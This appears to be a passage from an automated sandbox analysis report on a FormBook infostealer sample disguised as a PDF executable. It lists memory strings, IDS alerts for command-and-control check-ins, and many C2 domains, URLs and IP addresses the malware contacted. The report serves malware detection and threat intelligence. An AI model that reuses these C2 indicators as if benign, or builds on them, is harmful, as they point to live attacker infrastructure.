cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E28C0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D7967580
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D79672A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D78E3020
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E2FB0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2F60
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbp	0_2_00007FF7D7904BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D796FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 4x nop then pop esi	6_2_00417300
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop esi	9_2_00C57300

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49726 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.a2zglobalimports.com/kmge/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.icvp5o.xyz
Source:	DNS query: www.mrawkward.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.mrawkward.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.cq0jt.sbs replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.a2zglobalimports.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sejasuapropriachefe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.kickssoccercamp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.icvp5o.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.hhe-crv220.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sacksmantenimiento.store replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.n5l780.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.bedbillionaire.com replaycode: Name error (3)

HTTP GET or POST without a user agent

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 204.11.56.48 204.11.56.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_1124CF82 getaddrinfo,setsockopt,recv,

7_2_1124CF82

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.icvp5o.xyz
Source: global traffic	DNS traffic detected: DNS query: www.bedbillionaire.com
Source: global traffic	DNS traffic detected: DNS query: www.mrawkward.xyz
Source: global traffic	DNS traffic detected: DNS query: www.landfillequip.com
Source: global traffic	DNS traffic detected: DNS query: www.kickssoccercamp.com
Source: global traffic	DNS traffic detected: DNS query: www.cq0jt.sbs
Source: global traffic	DNS traffic detected: DNS query: www.hhe-crv220.com
Source: global traffic	DNS traffic detected: DNS query: www.sacksmantenimiento.store
Source: global traffic	DNS traffic detected: DNS query: www.a2zglobalimports.com
Source: global traffic	DNS traffic detected: DNS query: www.shearwaterpembrokeshire.com
Source: global traffic	DNS traffic detected: DNS query: www.sejasuapropriachefe.com
Source: global traffic	DNS traffic detected: DNS query: www.n5l780.com

Source: unknown

Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000007.00000002.4589318233.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2131057244.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4597265016.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a2zglobalimports.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.com/kmge/www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agritamaperkasaindonesia.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bedbillionaire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.com/kmge/www.gsolartech.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.blucretebistro.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cq0jt.sbsReferer:
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gsolartech.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/
